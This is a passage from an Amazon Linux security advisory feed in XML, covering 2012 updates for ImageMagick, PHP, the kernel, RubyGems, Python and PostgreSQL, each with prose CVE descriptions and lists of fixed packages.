The JPEGWarningHandler function in coders/jpeg.c in ImageMagick before 6.7.6-3 allows remote attackers to cause a denial of service (memory consumption) via a JPEG image with a crafted sequence of restart markers.
A denial of service flaw was found in the way ImageMagick decoded certain JPEG images. A remote attacker could provide a JPEG image with specially-crafted sequences of RST0 up to RST7 restart markers (used to indicate the input stream to be corrupted), which once processed by ImageMagick, would cause it to consume excessive amounts of memory and CPU time.
807994:
CVE-2012-0260 ImageMagick: excessive CPU use DoS by processing JPEG images with crafted restart markers
CVE-2012-0259:
The GetEXIFProperty function in magick/property.c in ImageMagick before 6.7.6-3 allows remote attackers to cause a denial of service (crash) via a zero value in the component count of an EXIF XResolution tag in a JPEG file, which triggers an out-of-bounds read.
An integer overflow flaw was found in the way ImageMagick processed certain Exif tags with a large components count. An attacker could create a specially-crafted image file that, when opened by a victim, could cause ImageMagick to access invalid memory and crash.
807993:
CVE-2012-0259 ImageMagick: Out-of heap-based buffer read by processing crafted JPEG EXIF header tag value
CVE-2012-0248:
ImageMagick 6.7.5-7 and earlier allows remote attackers to cause a denial of service (infinite loop and hang) via a crafted image whose IFD contains IOP tags that all reference the beginning of the IDF.
A denial of service flaw was found in the way ImageMagick processed images with malformed Exif metadata. An attacker could create a specially-crafted image file that, when opened by a victim, could cause ImageMagick to enter an infinite loop.
789443:
CVE-2012-0247 CVE-2012-0248 ImageMagick: invalid validation of images denial of service
CVE-2012-0247:
ImageMagick 6.7.5-7 and earlier allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code via crafted offset and count values in the ResolutionUnit tag in the EXIF IFD0 of an image.
A flaw was found in the way ImageMagick processed images with malformed Exchangeable image file format (Exif) metadata. An attacker could create a specially-crafted image file that, when opened by a victim, would cause ImageMagick to crash or, potentially, execute arbitrary code.
789443:
CVE-2012-0247 CVE-2012-0248 ImageMagick: invalid validation of images denial of service
CVE-2010-4167:
Untrusted search path vulnerability in configure.c in ImageMagick before 6.6.5-5, when MAGICKCORE_INSTALLED_SUPPORT is defined, allows local users to gain privileges via a Trojan horse configuration file in the current working directory.
It was found that ImageMagick utilities tried to load ImageMagick configuration files from the current working directory. If a user ran an ImageMagick utility in an attacker-controlled directory containing a specially-crafted ImageMagick configuration file, it could cause the utility to execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4167" title="" id="CVE-2010-4167" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0247" title="" id="CVE-2012-0247" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0248" title="" id="CVE-2012-0248" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0259" title="" id="CVE-2012-0259" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0260" title="" id="CVE-2012-0260" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1798" title="" id="CVE-2012-1798" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0544.html" title="" id="RHSA-2012:0544" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="ImageMagick-doc" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.5.4.7-6.12.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.5.4.7-6.12.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.5.4.7-6.12.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.5.4.7-6.12.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.5.4.7-6.12.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.5.4.7-6.12.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.5.4.7-6.12.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.5.4.7-6.12.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.5.4.7-6.12.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.5.4.7-6.12.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.5.4.7-6.12.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.5.4.7-6.12.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.5.4.7-6.12.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.5.4.7-6.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-77</id><title>Amazon Linux - ALAS-2012-77: critical priority package update for php</title><issued date="2012-05-09 14:54:00" /><updated date="2014-09-14 16:10:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1823:
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
A flaw was found in the way the php-cgi executable processed command line arguments when running in CGI mode. A remote attacker could send a specially-crafted request to a PHP script that would result in the query string being parsed by php-cgi as command line options and arguments. This could lead to the disclosure of the script's source code or arbitrary code execution with the privileges of the PHP interpreter.
A flaw was found in the way the php-cgi executable processed command line arguments when running in CGI mode. A remote attacker could send a specially-crafted request to a PHP script that would result in the query string being parsed by php-cgi as command line options and arguments. This could lead to the disclosure of the script's source code or arbitrary code execution with the privileges of the PHP interpreter.
818607:
CVE-2012-1823 php: command line arguments injection when run in CGI mode (VU#520827)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823" title="" id="CVE-2012-1823" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0546.html" title="" id="RHSA-2012:0546" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="php-dba" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-recode" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-recode-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-recode" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-recode-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.13-1.20.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-78</id><title>Amazon Linux - ALAS-2012-78: low priority package update for kernel</title><issued date="2012-05-21 16:47:00" /><updated date="2014-09-14 16:11:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2313:
The rio_ioctl function in drivers/net/ethernet/dlink/dl2k.c in the Linux kernel before 3.3.7 does not restrict access to the SIOCSMIIREG command, which allows local users to write data to an Ethernet adapter via an ioctl call.
818820:
CVE-2012-2313 kernel: unfiltered netdev rio_ioctl access by users
* A flaw was found in the way the Linux kernel's dl2k driver, used by certain D-Link Gigabit Ethernet adapters, restricted IOCTLs. A local, unprivileged user could use this flaw to issue potentially harmful IOCTLs, which could cause Ethernet adapters using the dl2k driver to malfunction (for example, losing network connectivity).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2313" title="" id="CVE-2012-2313" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.18-1.26.6.amzn1.noarch.rpm</filename></package><package name="kernel-tools" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.18-1.26.6.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.18-1.26.6.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.18-1.26.6.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.18-1.26.6.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.18-1.26.6.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.18-1.26.6.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.18-1.26.6.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.18-1.26.6.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.18-1.26.6.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.18-1.26.6.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.18-1.26.6.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.18-1.26.6.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.18-1.26.6.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.18-1.26.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-79</id><title>Amazon Linux - ALAS-2012-79: medium priority package update for rubygems</title><issued date="2012-05-21 16:48:00" /><updated date="2014-09-14 16:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2125:
RubyGems before 1.8.23 can redirect HTTPS connections to HTTP, which makes it easier for remote attackers to observe or modify a gem during installation via a man-in-the-middle attack.
It was found that, when using RubyGems, the connection could be redirected from HTTPS to HTTP. This could lead to a user believing they are installing a gem via HTTPS, when the connection may have been silently downgraded to HTTP.
814718:
CVE-2012-2125 CVE-2012-2126 rubygems: Two security fixes in v1.8.23
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2125" title="" id="CVE-2012-2125" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="rubygems-devel" version="1.8.11" release="3.1.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems-devel-1.8.11-3.1.amzn1.noarch.rpm</filename></package><package name="rubygems" version="1.8.11" release="3.1.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems-1.8.11-3.1.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-80</id><title>Amazon Linux - ALAS-2012-80: medium priority package update for python26</title><issued date="2012-05-21 16:50:00" /><updated date="2014-09-14 16:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0845:
SimpleXMLRPCServer.py in SimpleXMLRPCServer in Python before 2.6.8, 2.7.x before 2.7.3, 3.x before 3.1.5, and 3.2.x before 3.2.3 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via an XML-RPC POST request that contains a smaller amount of data than specified by the Content-Length header.
A flaw was found in the way the Python SimpleXMLRPCServer module handled clients disconnecting prematurely. A remote attacker could use this flaw to cause excessive CPU consumption on a server using SimpleXMLRPCServer.
789790:
CVE-2012-0845 python: SimpleXMLRPCServer CPU usage DoS via malformed XML-RPC request
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0845" title="" id="CVE-2012-0845" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="python26-devel" version="2.6.8" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python26-devel-2.6.8-1.45.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.8" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.8-1.45.amzn1.i686.rpm</filename></package><package name="python26-test" version="2.6.8" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.8-1.45.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.8" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.8-1.45.amzn1.i686.rpm</filename></package><package name="python26" version="2.6.8" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.8-1.45.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.8" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.8-1.45.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.8" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.8-1.45.amzn1.x86_64.rpm</filename></package><package name="python26-devel" version="2.6.8" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.8-1.45.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.8" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.8-1.45.amzn1.x86_64.rpm</filename></package><package name="python26-libs" version="2.6.8" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.8-1.45.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.8" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.8-1.45.amzn1.x86_64.rpm</filename></package><package name="python26-tools" version="2.6.8" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.8-1.45.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-81</id><title>Amazon Linux - ALAS-2012-81: medium priority package update for python27</title><issued date="2012-05-21 16:52:00" /><updated date="2014-09-14 16:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0845:
SimpleXMLRPCServer.py in SimpleXMLRPCServer in Python before 2.6.8, 2.7.x before 2.7.3, 3.x before 3.1.5, and 3.2.x before 3.2.3 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via an XML-RPC POST request that contains a smaller amount of data than specified by the Content-Length header.
A flaw was found in the way the Python SimpleXMLRPCServer module handled clients disconnecting prematurely. A remote attacker could use this flaw to cause excessive CPU consumption on a server using SimpleXMLRPCServer.
789790:
CVE-2012-0845 python: SimpleXMLRPCServer CPU usage DoS via malformed XML-RPC request
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0845" title="" id="CVE-2012-0845" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="python27" version="2.7.3" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.3-1.18.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.3" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.3-1.18.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.3" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.3-1.18.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.3" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.3-1.18.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.3" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.3-1.18.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.3" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.3-1.18.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.3" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.3-1.18.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.3" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.3-1.18.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.3" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.3-1.18.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.3" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.3-1.18.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.3" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.3-1.18.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.3" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.3-1.18.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-82</id><title>Amazon Linux - ALAS-2012-82: medium priority package update for postgresql8</title><issued date="2012-05-23 10:08:00" /><updated date="2014-09-14 16:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0868:
The pg_dump utility inserted object names literally into comments in the SQL script it produces. An unprivileged database user could create an object whose name includes a newline followed by an SQL command. This SQL command might then be executed by a privileged user during later restore of the backup dump, allowing privilege escalation.
CRLF injection vulnerability in pg_dump in PostgreSQL 8.3.x before 8.3.18, 8.4.x before 8.4.11, 9.0.x before 9.0.7, and 9.1.x before 9.1.3 allows user-assisted remote attackers to execute arbitrary SQL commands via a crafted file containing object names with newlines, which are inserted into an SQL script that is used when the database is restored.
797917:
CVE-2012-0868 postgresql: SQL injection due unsanitized newline characters in object names
CVE-2012-0867:
When configured to do SSL certificate verification, PostgreSQL only checked the first 31 characters of the certificate's Common Name field. Depending on the configuration, this could allow an attacker to impersonate a server or a client using a certificate from a trusted Certificate Authority issued for a different name.
PostgreSQL 8.4.x before 8.4.11, 9.0.x before 9.0.7, and 9.1.x before 9.1.3 truncates the common name to only 32 characters when verifying SSL certificates, which allows remote attackers to spoof connections when the host name is exactly 32 characters.
797915:
CVE-2012-0867 postgresql: MITM due improper x509_v3 CN validation during certificate verification
CVE-2012-0866:
